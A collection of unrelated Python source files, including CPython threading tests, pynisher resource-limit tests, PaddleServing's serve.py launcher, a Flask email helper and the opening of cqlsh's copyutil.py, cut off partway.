except RecursionError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
self.assertEqual(data, expected_output)
def test_print_exception(self):
script = r"""if True:
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
@requires_type_collecting
def test_print_exception_stderr_is_none_1(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
sys.stderr = None
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_2(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
sys.stderr = None
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
self.assertNotIn("Unhandled exception", err.decode())
def test_bare_raise_in_brand_new_thread(self):
def bare_raise():
raise
class Issue27558(threading.Thread):
exc = None
def run(self):
try:
bare_raise()
except Exception as exc:
self.exc = exc
thread = Issue27558()
thread.start()
thread.join()
self.assertIsNotNone(thread.exc)
self.assertIsInstance(thread.exc, RuntimeError)
# explicitly break the reference cycle to not leak a dangling thread
thread.exc = None
class TimerTests(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.callback_args = []
self.callback_event = threading.Event()
def test_init_immutable_default_args(self):
# Issue 17435: constructor defaults were mutable objects, they could be
# mutated via the object attributes and affect other Timer objects.
timer1 = threading.Timer(0.01, self._callback_spy)
timer1.start()
self.callback_event.wait()
timer1.args.append("blah")
timer1.kwargs["foo"] = "bar"
self.callback_event.clear()
timer2 = threading.Timer(0.01, self._callback_spy)
timer2.start()
self.callback_event.wait()
self.assertEqual(len(self.callback_args), 2)
self.assertEqual(self.callback_args, [((), {}), ((), {})])
timer1.join()
timer2.join()
def _callback_spy(self, *args, **kwargs):
self.callback_args.append((args[:], kwargs.copy()))
self.callback_event.set()
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class PyRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock is None, 'RLock not implemented in C')
class CRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._CRLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
class BarrierTests(lock_tests.BarrierTests):
barriertype = staticmethod(threading.Barrier)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
extra = {"ThreadError"}
blacklist = {'currentThread', 'activeCount'}
support.check__all__(self, threading, ('threading', '_thread'),
extra=extra, blacklist=blacklist)
if __name__ == "__main__":
unittest.main()
|
windows_test_cases.py
|
#! /bin/python
import time
import multiprocessing
import unittest
import os
import sys
import signal
import logging
import pynisher
import psutil
try:
import sklearn
is_sklearn_available = True
except ImportError:
print("Scikit Learn was not found!")
is_sklearn_available = False
all_tests=1
logger = multiprocessing.log_to_stderr()
logger.setLevel(logging.WARNING)
# TODO: add tests with large return value to test for deadlock!
def rogue_subprocess():
pid = os.getpid()
oldgrp = os.getpgrp()
os.setpgrp()
logger.debug("{}: Changed group id from {} to {}".format(pid, oldgrp, os.getpgrp()))
time.sleep(60)
def spawn_rogue_subprocess(num_procs = 5):
for i in range(num_procs):
p = multiprocessing.Process(target=rogue_subprocess, daemon=False)
p.start()
p = psutil.Process()
time.sleep(10)
def simulate_work(size_in_mb, wall_time_in_s, num_processes):
# allocate memory (size_in_mb) with an array
# note the actual size in memory of this process is a little bit larger
A = [42.]*((1024*1024*size_in_mb)//8)
# try to spawn new processes
if (num_processes > 0):
# data parallelism
multiprocessing.Pool(num_processes)
# sleep for specified duration
time.sleep(wall_time_in_s+1)
return(size_in_mb, wall_time_in_s, num_processes)
def svm_example(n_samples = 10000, n_features = 100):
from sklearn.svm import SVR
from sklearn.datasets import make_regression
X,Y = make_regression(n_samples, n_features)
m = SVR()
m.fit(X,Y)
def svc_example(n_samples = 10000, n_features = 4):
from sklearn.svm import LinearSVC
from sklearn.preprocessing import PolynomialFeatures
from sklearn.datasets import make_classification
X,Y = make_classification(n_samples, n_features)
#pp = PolynomialFeatures(degree=3)
#X = pp.fit_transform(X)
m = LinearSVC()
m.fit(X,Y)
def crash_unexpectedly(signum):
print("going to receive signal {}.".format(signum))
pid = os.getpid()
time.sleep(1)
os.kill(pid, signum)
time.sleep(1)
def return_big_array(num_elements):
return([1]*num_elements)
def cpu_usage():
i = 1
while True:
i += 1
def print_and_sleep(t):
for i in range(t):
print(i)
time.sleep(1)
def print_and_fail():
print(0)
raise RuntimeError()
def nested_pynisher(level=2, cputime=5, walltime=5, memlimit = 10e24, increment = -1, grace_period = 1):
print("this is level {}".format(level))
if level == 0:
spawn_rogue_subprocess(10)
else:
func = pynisher.enforce_limits(mem_in_mb=memlimit, cpu_time_in_s=cputime, wall_time_in_s=walltime, grace_period_in_s = grace_period)(nested_pynisher)
func(level-1, None, walltime+increment, memlimit, increment)
def assertEqual(a, b):
assert a == b
def assertIsNone(a):
assert a is None
def assertTrue(a):
assert a
if __name__ == "__main__":
print("Testing capturing of output.")
time_limit = 2
grace_period = 1
wrapped_function = pynisher.enforce_limits(wall_time_in_s = time_limit, mem_in_mb=None, grace_period_in_s=grace_period, logger=logger, capture_output=True)(print_and_sleep)
wrapped_function(5)
assertTrue('0' in wrapped_function.stdout)
assertTrue(wrapped_function.stderr == '')
wrapped_function = pynisher.enforce_limits(wall_time_in_s = time_limit, mem_in_mb=None, grace_period_in_s=grace_period, logger=logger, capture_output=True)(print_and_fail)
wrapped_function()
assertTrue('0' in wrapped_function.stdout)
assertTrue('RuntimeError' in wrapped_function.stderr)
print("OK!")
print("Testing wall clock time constraint.")
local_mem_in_mb = None
local_wall_time_in_s = 1
local_cpu_time_in_s = None
local_grace_period = None
wrapped_function = pynisher.enforce_limits(mem_in_mb = local_mem_in_mb, wall_time_in_s=local_wall_time_in_s, cpu_time_in_s = local_cpu_time_in_s, grace_period_in_s = local_grace_period)(simulate_work)
for mem in range(1,10):
assertIsNone(wrapped_function(mem,10,0))
assertEqual(wrapped_function.exit_status, pynisher.TimeoutException)
print("OK!")
print("Testing cpu time constraint.")
cpu_time_in_s = 2
grace_period = 1
wrapped_function = pynisher.enforce_limits(cpu_time_in_s = cpu_time_in_s, grace_period_in_s = grace_period)(cpu_usage)
assertEqual(None,wrapped_function())
assertEqual(wrapped_function.exit_status, pynisher.CpuTimeoutException)
print("OK!")
print("Testing number of processes constraint.")
local_mem_in_mb = None
local_num_processes = 1
local_wall_time_in_s = None
local_grace_period = None
wrapped_function = pynisher.enforce_limits(mem_in_mb = local_mem_in_mb, wall_time_in_s=local_wall_time_in_s,num_processes = local_num_processes, grace_period_in_s = local_grace_period)(simulate_work)
for processes in [2,15,50,100,250]:
assertIsNone(wrapped_function(0,0, processes))
assertEqual(wrapped_function.exit_status, pynisher.SubprocessException)
print("OK!")
print("Testing unbounded function call which have to run through!")
local_mem_in_mb = None
local_wall_time_in_s = None
local_cpu_time_in_s = None
local_grace_period = None
wrapped_function = pynisher.enforce_limits(mem_in_mb = local_mem_in_mb, wall_time_in_s=local_wall_time_in_s, cpu_time_in_s = local_cpu_time_in_s, grace_period_in_s = local_grace_period)(simulate_work)
for mem in [1,2,4,8,16]:
assertEqual((mem,0,0),wrapped_function(mem,0,0))
assertEqual(wrapped_function.exit_status, 0)
print("OK!")
print("Testing memory constraint.")
local_mem_in_mb = 128
local_wall_time_in_s = None
local_cpu_time_in_s = None
local_grace_period = None
wrapped_function = pynisher.enforce_limits(mem_in_mb = local_mem_in_mb, wall_time_in_s=local_wall_time_in_s, cpu_time_in_s = local_cpu_time_in_s, grace_period_in_s = local_grace_period)(simulate_work)
for mem in [1024, 2048, 4096]:
assertIsNone(wrapped_function(mem,0,0))
print("OK!")
print("Testing an unexpected signal simulating a crash.")
wrapped_function = pynisher.enforce_limits()(crash_unexpectedly)
assertIsNone(wrapped_function(signal.SIGTERM))
assertEqual(wrapped_function.exit_status, pynisher.AnythingException)
print("OK!")
print("Testing big return values")
wrapped_function = pynisher.enforce_limits()(return_big_array)
for num_elements in [4,16,64, 256, 1024, 4096, 16384, 65536, 262144]:
bla = wrapped_function(num_elements)
assertEqual(len(bla), num_elements)
# wrapped_function = pynisher.enforce_limits(wall_time_in_s = 1)(spawn_rogue_subprocess)
# wrapped_function(5)
# time.sleep(1)
# p = psutil.Process()
# assertEqual(len(p.children(recursive=True)), 0)
wrapped_function = pynisher.enforce_limits(wall_time_in_s = 2)(svm_example)
start = time.time()
wrapped_function(16384, 128)
duration = time.time()-start
time.sleep(1)
p = psutil.Process()
assertEqual(len(p.children(recursive=True)), 0)
assertTrue(duration < 2.1)
time_limit = 2
grace_period = 1
wrapped_function = pynisher.enforce_limits(cpu_time_in_s = time_limit, mem_in_mb=None, grace_period_in_s=grace_period, logger=logger)(svc_example)
wrapped_function(16384, 1000)
time.sleep(1)
p = psutil.Process()
assertEqual(len(p.children(recursive=True)), 0)
# fails with pynisher.AnythingException for some reason
assertEqual(wrapped_function.exit_status, pynisher.CpuTimeoutException)
# assertTrue(duration > time_limit-0.1)
# assertTrue(duration < time_limit+grace_period+0.1)
tl = 2 #time limit
gp = 1 #grace period
start = time.time()
nested_pynisher(level=2, cputime = 2, walltime = 2, memlimit = None, increment = 1, grace_period = gp)
duration = time.time()-start
print(duration)
time.sleep(1)
p = psutil.Process()
assertEqual(len(p.children(recursive=True)), 0)
assertTrue(duration > tl-0.1)
assertTrue(duration < tl+gp+0.1)
print("OK!")
|
serve.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Usage:
Host a trained paddle model with one line command
Example:
python -m paddle_serving_server.serve --model ./serving_server_model --port 9292
"""
import argparse
import os
import json
import base64
import time
from multiprocessing import Process
import sys
if sys.version_info.major == 2:
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
elif sys.version_info.major == 3:
from http.server import BaseHTTPRequestHandler, HTTPServer
from contextlib import closing
import socket
from paddle_serving_server.env import CONF_HOME
import signal
from paddle_serving_server.util import *
from paddle_serving_server.env_check.run import *
# web_service.py is still used by Pipeline.
def port_is_available(port):
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.settimeout(2)
result = sock.connect_ex(('127.0.0.1', port))
if result != 0:
return True
else:
return False
def format_gpu_to_strlist(unformatted_gpus):
gpus_strlist = []
if isinstance(unformatted_gpus, int):
gpus_strlist = [str(unformatted_gpus)]
elif isinstance(unformatted_gpus, list):
if unformatted_gpus == [""]:
gpus_strlist = ["-1"]
elif len(unformatted_gpus) == 0:
gpus_strlist = ["-1"]
else:
gpus_strlist = [str(x) for x in unformatted_gpus]
elif isinstance(unformatted_gpus, str):
if unformatted_gpus == "":
gpus_strlist = ["-1"]
else:
gpus_strlist = [unformatted_gpus]
elif unformatted_gpus == None:
gpus_strlist = ["-1"]
else:
raise ValueError("error input of set_gpus")
# check cuda visible
if "CUDA_VISIBLE_DEVICES" in os.environ:
env_gpus = os.environ["CUDA_VISIBLE_DEVICES"].split(",")
for op_gpus_str in gpus_strlist:
op_gpu_list = op_gpus_str.split(",")
# op_gpu_list == ["-1"] means this op use CPU
# so don`t check cudavisible.
if op_gpu_list == ["-1"]:
continue
for ids in op_gpu_list:
if ids not in env_gpus:
print("gpu_ids is not in CUDA_VISIBLE_DEVICES.")
exit(-1)
# check gpuid is valid
for op_gpus_str in gpus_strlist:
op_gpu_list = op_gpus_str.split(",")
use_gpu = False
for ids in op_gpu_list:
if int(ids) < -1:
raise ValueError("The input of gpuid error.")
if int(ids) >= 0:
use_gpu = True
if int(ids) == -1 and use_gpu:
raise ValueError("You can not use CPU and GPU in one model.")
return gpus_strlist
def is_gpu_mode(unformatted_gpus):
gpus_strlist = format_gpu_to_strlist(unformatted_gpus)
for op_gpus_str in gpus_strlist:
op_gpu_list = op_gpus_str.split(",")
for ids in op_gpu_list:
if int(ids) >= 0:
return True
return False
def serve_args():
parser = argparse.ArgumentParser("serve")
parser.add_argument(
"server",
type=str,
default="start",
nargs="?",
help="stop or start PaddleServing, check running environemnt")
parser.add_argument(
"--thread",
type=int,
default=4,
help="Concurrency of server,[4,1024]",
choices=range(4, 1025))
parser.add_argument(
"--port", type=int, default=9393, help="Port of the starting gpu")
parser.add_argument(
"--device", type=str, default="cpu", help="Type of device")
parser.add_argument(
"--gpu_ids", type=str, default="", nargs="+", help="gpu ids")
parser.add_argument(
"--runtime_thread_num",
type=int,
default=0,
nargs="+",
help="Number of each op")
parser.add_argument(
"--batch_infer_size",
type=int,
default=32,
nargs="+",
help="Max batch of each op")
parser.add_argument(
"--model", type=str, default="", nargs="+", help="Model for serving")
parser.add_argument(
"--op", type=str, default="", nargs="+", help="Model for serving")
parser.add_argument(
"--workdir",
type=str,
default="workdir",
help="Working dir of current service")
parser.add_argument(
"--use_mkl", default=False, action="store_true", help="Use MKL")
parser.add_argument(
"--precision",
type=str,
default="fp32",
help="precision mode(fp32, int8, fp16, bf16)")
parser.add_argument(
"--use_calib",
default=False,
action="store_true",
help="Use TensorRT Calibration")
parser.add_argument(
"--mem_optim_off",
default=False,
action="store_true",
help="Memory optimize")
parser.add_argument(
"--ir_optim", default=False, action="store_true", help="Graph optimize")
parser.add_argument(
"--max_body_size",
type=int,
default=512 * 1024 * 1024,
help="Limit sizes of messages")
parser.add_argument(
"--use_encryption_model",
default=False,
action="store_true",
help="Use encryption model")
parser.add_argument(
"--use_trt", default=False, action="store_true", help="Use TensorRT")
parser.add_argument(
"--use_lite", default=False, action="store_true", help="Use PaddleLite")
parser.add_argument(
"--use_xpu", default=False, action="store_true", help="Use XPU")
parser.add_argument(
"--use_ascend_cl",
default=False,
action="store_true",
help="Use Ascend CL")
parser.add_argument(
"--product_name",
type=str,
default=None,
help="product_name for authentication")
parser.add_argument(
"--container_id",
type=str,
default=None,
help="container_id for authentication")
parser.add_argument(
"--gpu_multi_stream",
default=False,
action="store_true",
help="Use gpu_multi_stream")
parser.add_argument(
"--enable_prometheus", default=False, action="store_true", help="Use Prometheus")
parser.add_argument(
"--prometheus_port", type=int, default=19393, help="Port of the Prometheus")
return parser.parse_args()
def start_gpu_card_model(gpu_mode, port, args): # pylint: disable=doc-string-missing
device = "cpu"
if gpu_mode == True:
device = "gpu"
import paddle_serving_server as serving
op_maker = serving.OpMaker()
op_seq_maker = serving.OpSeqMaker()
server = serving.Server()
thread_num = args.thread
model = args.model
mem_optim = args.mem_optim_off is False
ir_optim = args.ir_optim
use_mkl = args.use_mkl
max_body_size = args.max_body_size
workdir = "{}_{}".format(args.workdir, port)
dag_list_op = []
if model == "":
print("You must specify your serving model")
exit(-1)
for single_model_config in args.model:
if os.path.isdir(single_model_config):
pass
elif os.path.isfile(single_model_config):
raise ValueError("The input of --model should be a dir not file.")
# 如果通过--op GeneralDetectionOp GeneralRecOp
# 将不存在的自定义OP加入到DAG图和模型的列表中
# 并将传入顺序记录在dag_list_op中。
if args.op != "":
for single_op in args.op:
temp_str_list = single_op.split(':')
if len(temp_str_list) >= 1 and temp_str_list[0] != '':
if temp_str_list[0] not in op_maker.op_list:
op_maker.op_list.append(temp_str_list[0])
if len(temp_str_list) >= 2 and temp_str_list[1] == '0':
pass
else:
server.default_engine_types.append(temp_str_list[0])
dag_list_op.append(temp_str_list[0])
read_op = op_maker.create('GeneralReaderOp')
op_seq_maker.add_op(read_op)
#如果dag_list_op不是空,那么证明通过--op 传入了自定义OP或自定义的DAG串联关系。
#此时,根据--op 传入的顺序去组DAG串联关系
if len(dag_list_op) > 0:
for single_op in dag_list_op:
op_seq_maker.add_op(op_maker.create(single_op))
#否则,仍然按照原有方式根虎--model去串联。
else:
for idx, single_model in enumerate(model):
infer_op_name = "GeneralInferOp"
# 目前由于ocr的节点Det模型依赖于opencv的第三方库
# 只有使用ocr的时候,才会加入opencv的第三方库并编译GeneralDetectionOp
# 故此处做特殊处理,当不满足下述情况时,所添加的op默认为GeneralInferOp
# 以后可能考虑不用python脚本来生成配置
if len(model) == 2 and idx == 0 and single_model == "ocr_det_model":
infer_op_name = "GeneralDetectionOp"
else:
infer_op_name = "GeneralInferOp"
general_infer_op = op_maker.create(infer_op_name)
op_seq_maker.add_op(general_infer_op)
general_response_op = op_maker.create('GeneralResponseOp')
op_seq_maker.add_op(general_response_op)
server.set_op_sequence(op_seq_maker.get_op_sequence())
server.set_num_threads(thread_num)
server.use_mkl(use_mkl)
server.set_precision(args.precision)
server.set_use_calib(args.use_calib)
server.set_memory_optimize(mem_optim)
server.set_ir_optimize(ir_optim)
server.set_max_body_size(max_body_size)
server.set_enable_prometheus(args.enable_prometheus)
server.set_prometheus_port(args.prometheus_port)
if args.use_trt and device == "gpu":
server.set_trt()
server.set_ir_optimize(True)
if args.gpu_multi_stream and device == "gpu":
server.set_gpu_multi_stream()
if args.runtime_thread_num:
server.set_runtime_thread_num(args.runtime_thread_num)
if args.batch_infer_size:
server.set_batch_infer_size(args.batch_infer_size)
if args.use_lite:
server.set_lite()
server.set_device(device)
if args.use_xpu:
server.set_xpu()
if args.use_ascend_cl:
server.set_ascend_cl()
if args.product_name != None:
server.set_product_name(args.product_name)
if args.container_id != None:
server.set_container_id(args.container_id)
if gpu_mode == True or args.use_xpu or args.use_ascend_cl:
server.set_gpuid(args.gpu_ids)
server.load_model_config(model)
server.prepare_server(
workdir=workdir,
port=port,
device=device,
use_encryption_model=args.use_encryption_model)
server.run_server()
def start_multi_card(args, serving_port=None): # pylint: disable=doc-string-missing
if serving_port == None:
serving_port = args.port
if args.use_lite:
print("run using paddle-lite.")
start_gpu_card_model(False, serving_port, args)
else:
start_gpu_card_model(is_gpu_mode(args.gpu_ids), serving_port, args)
class MainService(BaseHTTPRequestHandler):
def get_available_port(self):
default_port = 12000
for i in range(1000):
if port_is_available(default_port + i):
return default_port + i
def start_serving(self):
start_multi_card(args, serving_port)
def get_key(self, post_data):
if "key" not in post_data:
return False
else:
key = base64.b64decode(post_data["key"].encode())
for single_model_config in args.model:
if os.path.isfile(single_model_config):
raise ValueError(
"The input of --model should be a dir not file.")
with open(single_model_config + "/key", "wb") as f:
f.write(key)
return True
def check_key(self, post_data):
if "key" not in post_data:
return False
else:
key = base64.b64decode(post_data["key"].encode())
for single_model_config in args.model:
if os.path.isfile(single_model_config):
raise ValueError(
"The input of --model should be a dir not file.")
with open(single_model_config + "/key", "rb") as f:
cur_key = f.read()
if key != cur_key:
return False
return True
def start(self, post_data):
post_data = json.loads(post_data.decode('utf-8'))
global p_flag
if not p_flag:
if args.use_encryption_model:
print("waiting key for model")
if not self.get_key(post_data):
print("not found key in request")
return False
global serving_port
global p
serving_port = self.get_available_port()
p = Process(target=self.start_serving)
p.start()
time.sleep(3)
if p.is_alive():
p_flag = True
else:
return False
else:
if p.is_alive():
if not self.check_key(post_data):
return False
else:
return False
return True
def do_POST(self):
content_length = int(self.headers['Content-Length'])
post_data = self.rfile.read(content_length)
if self.start(post_data):
response = {"endpoint_list": [serving_port]}
else:
response = {"message": "start serving failed"}
self.send_response(200)
self.send_header('Content-type', 'application/json')
self.end_headers()
self.wfile.write(json.dumps(response).encode())
def stop_serving(command: str, port: int=None):
'''
Stop PaddleServing by port.
Args:
command(str): stop->SIGINT, kill->SIGKILL
port(int): Default to None, kill all processes in ProcessInfo.json.
Not None, kill the specific process relating to port
Returns:
True if stop serving successfully.
False if error occured
Examples:
.. code-block:: python
stop_serving("stop", 9494)
'''
filepath = os.path.join(CONF_HOME, "ProcessInfo.json")
infoList = load_pid_file(filepath)
if infoList is False:
return False
lastInfo = infoList[-1]
for info in infoList:
storedPort = info["port"]
pid = info["pid"]
model = info["model"]
start_time = info["start_time"]
if port is not None:
if port in storedPort:
kill_stop_process_by_pid(command, pid)
infoList.remove(info)
if len(infoList):
with open(filepath, "w") as fp:
json.dump(infoList, fp)
else:
os.remove(filepath)
return True
else:
if lastInfo == info:
raise ValueError(
"Please confirm the port [%s] you specified is correct."
% port)
else:
pass
else:
kill_stop_process_by_pid(command, pid)
if lastInfo == info:
os.remove(filepath)
return True
if __name__ == "__main__":
# args.device is not used at all.
# just keep the interface.
# so --device should not be recommended at the HomePage.
args = serve_args()
if args.server == "stop" or args.server == "kill":
result = 0
if "--port" in sys.argv:
result = stop_serving(args.server, args.port)
else:
result = stop_serving(args.server)
if result == 0:
os._exit(0)
else:
os._exit(-1)
elif args.server == "check":
check_env()
os._exit(0)
for single_model_config in args.model:
if os.path.isdir(single_model_config):
pass
elif os.path.isfile(single_model_config):
raise ValueError("The input of --model should be a dir not file.")
if port_is_available(args.port):
portList = [args.port]
dump_pid_file(portList, args.model)
if args.use_encryption_model:
p_flag = False
p = None
serving_port = 0
server = HTTPServer(('0.0.0.0', int(args.port)), MainService)
print(
'Starting encryption server, waiting for key from client, use <Ctrl-C> to stop'
)
server.serve_forever()
else:
start_multi_card(args)
|
email.py
|
from flask_mail import Message
from flask import current_app
from app import mail
from threading import Thread
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_email(subject, sender, recipients, text_body):
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
Thread(target=send_async_email, args=(current_app._get_current_object(), msg)).start()
|
copyutil.py
|
# cython: profile=True
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
import csv
import datetime
import json
import glob
import multiprocessing as mp
import os
import platform
import random
import re
import signal
import six
import struct
import sys
import threading
import time
import traceback
from bisect import bisect_right
from calendar import timegm
from collections import defaultdict, namedtuple
from decimal import Decimal
from random import randint
from io import BytesIO, StringIO
from select import select
from uuid import UUID
from .util import profile_on, profile_off
from six import ensure_str, ensure_text
from six.moves import configparser
from six.moves import range
from six.moves.queue import Queue
from cassandra import OperationTimedOut
from cassandra.cluster import Cluster, DefaultConnection
from cassandra.cqltypes import ReversedType, UserType, BytesType, VarcharType
from cassandra.metadata import protect_name, protect_names, protect_value
from cassandra.policies import RetryPolicy, WhiteListRoundRobinPolicy, DCAwareRoundRobinPolicy, FallthroughRetryPolicy
from cassandra.query import BatchStatement, BatchType, SimpleStatement, tuple_factory
from cassandra.util import Date, Time
from cqlshlib.util import profile_on, profile_off
from cqlshlib.cql3handling import CqlRuleSet
from cqlshlib.displaying import NO_COLOR_MAP
from cqlshlib.formatting import format_value_default, CqlType, DateTimeFormat, EMPTY, get_formatter, BlobType
from cqlshlib.sslhandling import ssl_settings
PROFILE_ON = False
STRACE_ON = False
DEBUG = False # This may be set to True when initializing the task
IS_LINUX = platform.system() == 'Linux'
CopyOptions = namedtuple('CopyOptions', 'copy dialect unrecognized')
def safe_normpath(fname):
"""
:return the normalized path but only if there is a filename, we don't want to convert
an empty string (which means no file name) to a dot. Also expand any user variables such as ~ to the full path
"""
return os.path.normpath(os.path.expanduser(fname)) if fname else fname
def printdebugmsg(msg):
if DEBUG:
printmsg(msg)
def printmsg(msg, eol='\n', encoding='utf8'):
sys.stdout.write(msg)
sys.stdout.write(eol)
sys.stdout.flush()
# Keep arguments in sync with printmsg
def swallowmsg(msg, eol='', encoding=''):
None
class OneWayPipe(object):
"""
A one way pipe protected by two process level locks, one for reading and one for writing.
"""
def __init__(self):
self.reader, self.writer = mp.Pipe(duplex=False)
self.rlock = mp.Lock()
self.wlock = mp.Lock()
def send(self, obj):
with self.wlock:
self.writer.send(obj)
def recv(self):
with self.rlock:
return self.reader.recv()
def close(self):
self.reader.close()
self.writer.close()
class ReceivingChannel(object):
"""
A one way channel that wraps a pipe to receive messages.
"""
def __init__(self, pipe):
self.pipe = pipe
def recv(self):
return self.pipe.recv()
def close(self):
self.pipe.close()
class SendingChannel(object):
"""
A one way channel that wraps a pipe and provides a feeding thread to send messages asynchronously.
"""
def __init__(self, pipe):
self.pipe = pipe
self.pending_messages = Queue()
def feed():
while True:
try:
msg = self.pending_messages.get()
self.pipe.send(msg)
except Exception as e:
printmsg('%s: %s' % (e.__class__.__name__, e.message if hasattr(e, 'message') else str(e)))
feeding_thread = threading.Thread(target=feed)
feeding_thread.setDaemon(True)
feeding_thread.start()
def send(self, obj):
self.pending_messages.put(obj)
def num_pending(self):
return self.pending_messages.qsize() if self.pending_messages else 0
def close(self):
self.pipe.close()
class SendingChannels(object):
"""
A group of one way channels for sending messages.
"""
def __init__(self, num_channels):
self.pipes = [OneWayPipe() for _ in range(num_channels)]
self.channels = [SendingChannel(p) for p in self.pipes]
self.num_channels = num_channels
def close(self):
for ch in self.channels:
try:
ch.close()
except Exception:
pass
class ReceivingChannels(object):
"""
A group of one way channels for receiving messages.
"""
def __init__(self, num_channels):
self.pipes = [OneWayPipe() for _ in range(num_channels)]
self.channels = [ReceivingChannel(p) for p in self.pipes]
self._readers = [p.reader for p in self.pipes]
self._rlocks = [p.rlock for p in self.pipes]
self._rlocks_by_readers = dict([(p.reader, p.rlock) for p in self.pipes])
self.num_channels = num_channels
self.recv = self.recv_select if IS_LINUX else self.recv_polling
def recv_select(self, timeout):
"""
Implementation of the recv method for Linux, where select is available. Receive an object from
all pipes that are ready for reading without blocking.
"""
readable, _, _ = select(self._readers, [], [], timeout)
for r in readable:
with self._rlocks_by_readers[r]:
try:
yield r.recv()
except EOFError:
continue
def recv_polling(self, timeout):
"""
Implementation of the recv method for platforms where select() is not available for pipes.
We poll on all of the readers with a very small timeout. We stop when the timeout specified
has been received but we may exceed it since we check all processes during each sweep.
"""
start = time.time()
while True:
for i, r in enumerate(self._readers):
with self._rlocks[i]:
if r.poll(0.000000001):
try:
yield r.recv()
except EOFError:
continue
if time.time() - start > timeout:
break
def close(self):
for ch in self.channels:
try:
ch.close()
except Exception:
pass
class CopyTask(object):
"""
A base class for ImportTask and ExportTask
"""
def __init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file, direction):
self.shell = shell
self.ks = ks
self.table = table
self.table_meta = self.shell.get_table_meta(self.ks, self.table)
self.host = shell.conn.get_control_connection_host()
self.fname = safe_normpath(fname)
self.protocol_version = protocol_version
self.config_file = config_file
# if cqlsh is invoked with --debug then set the global debug flag to True
if shell.debug:
global DEBUG
DEBUG = True
# do not display messages when exporting to STDOUT unless --debug is set
self.printmsg = printmsg if self.fname is not None or direction == 'from' or DEBUG \
else swallowmsg
self.options = self.parse_options(opts, direction)
self.num_processes = self.options.copy['numprocesses']
self.encoding = self.options.copy['encoding']
self.printmsg('Using %d child processes' % (self.num_processes,))
if direction == 'from':
self.num_processes += 1 # add the feeder process
self.processes = []
self.inmsg = ReceivingChannels(self.num_processes)
self.outmsg = SendingChannels(self.num_processes)
self.columns = CopyTask.get_columns(shell, ks, table, columns)
self.time_start = time.time()
def maybe_read_config_file(self, opts, direction):
"""
Read optional sections from a configuration file that was specified in the command options or from the default
cqlshrc configuration file if none was specified.
"""
config_file = opts.pop('configfile', '')
if not config_file:
config_file = self.config_file
if not os.path.isfile(config_file):
return opts
configs = configparser.RawConfigParser()
configs.readfp(open(config_file))
ret = dict()
config_sections = list(['copy', 'copy-%s' % (direction,),
'copy:%s.%s' % (self.ks, self.table),
'copy-%s:%s.%s' % (direction, self.ks, self.table)])
for section in config_sections:
if configs.has_section(section):
options = dict(configs.items(section))
self.printmsg("Reading options from %s:[%s]: %s" % (config_file, section, options))
ret.update(options)
# Update this last so the command line options take precedence over the configuration file options
if opts:
self.printmsg("Reading options from the command line: %s" % (opts,))
ret.update(opts)
if self.shell.debug: # this is important for testing, do not remove
self.printmsg("Using options: '%s'" % (ret,))
return ret
@staticmethod
def clean_options(opts):
"""
Convert all option values to valid string literals unless they are path names
"""
